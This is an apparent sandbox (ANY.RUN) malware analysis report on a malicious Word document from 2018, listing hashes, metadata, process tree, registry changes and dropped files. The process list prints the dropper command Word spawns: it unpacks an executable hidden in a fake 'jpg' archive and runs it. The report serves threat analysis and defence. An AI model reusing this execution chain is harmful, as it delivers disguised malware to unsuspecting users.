analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

14bd1ab23d13543835821dd1fa5c17fc8c055341d09694971b5f2775c634f66e

Full analysis: https://app.any.run/tasks/37435298-ed3e-4b87-8dae-fbdf3e0bc4d2
Verdict: Malicious activity
Analysis date: December 06, 2018, 13:04:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

92B1C50C3DDF8289E85CBB7F8EEAD077

SHA1:

2D22BF18AB1A8DB0309C477472B481B0641B9DC7

SHA256:

14BD1AB23D13543835821DD1FA5C17FC8C055341D09694971B5F2775C634F66E

SSDEEP:

1536:KYC4876zcyODTKszH6momtNiNvHuz5wkNXxYm0H:K/yODTzza5uNi8zeiYtH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2936)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2936)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2936)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2936)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XML

AppVersion: 15
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 5383
LinksUpToDate: No
Company: -
TitlesOfParts: -
HeadingPairs:
  • Title
  • 1
ScaleCrop: No
Paragraphs: 10
Lines: 38
DocSecurity: None
Application: Microsoft Office Word
Characters: 4589
Words: 804
Pages: 6
TotalEditTime: 11 minutes
Template: Normal
ModifyDate: 2018:11:21 12:27:00Z
CreateDate: 2011:12:14 08:29:00Z
RevisionNumber: 4
LastModifiedBy: 123

XMP

Creator: tvkisdsy

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1981
ZipCompressedSize: 424
ZipCRC: 0x536c49fa
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs rar.exe no specs rar.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2936"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\14bd1ab23d13543835821dd1fa5c17fc8c055341d09694971b5f2775c634f66e.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2796C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe C:\WINDOWS\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3748rar.exe e -o+ -r -inul *.rar scan042.jpg C:\Program Files\WinRAR\Rar.execmd.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
Command line RAR
Exit code:
10
Version:
5.60.0
3368rar.exe e -o+ -r -inul scan042.jpg backup.exe C:\Program Files\WinRAR\Rar.execmd.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
Command line RAR
Exit code:
10
Version:
5.60.0
Total events
778
Read events
736
Write events
38
Delete events
4

Modification events

(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:#+%
Value:
232B2500780B0000010000000000000000000000
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2936) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1300627486
(PID) Process:(2936) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1300627600
(PID) Process:(2936) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1300627601
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
780B0000DE22A555648DD40100000000
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:y-%
Value:
792D2500780B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:y-%
Value:
792D2500780B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
0
Text files
0
Unknown types
23

Dropped files

PID
Process
Filename
Type
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8FA3.tmp.cvr
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83435ED2.png
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B71E26F1.wmf
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$bd1ab23d13543835821dd1fa5c17fc8c055341d09694971b5f2775c634f66e.docxpgc
MD5:19CA5C190EA4A0ED0F8841B460AB3F2C
SHA256:6D6834514B05FB457940BBC3484AEE21D37949A9C30512453D6CC1E120E5AC37
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.solsol
MD5:E7A1B47D23064F88AFC24F0104C52829
SHA256:ADF2CCCE15B4AF85D62FFAFF4D524AC083FA484C42791F03CB75FA1AF58596BC
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:BCA7725C8CB9C8D63EC166E879124B21
SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\ShockwaveFlashObjects.exdtlb
MD5:62A936908DECD28EF47199A0EA3A6F67
SHA256:B9135838C87F9AB7E976001F42CBF5E3273FFED4CCC9A1A1151BFE8C29232D5D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info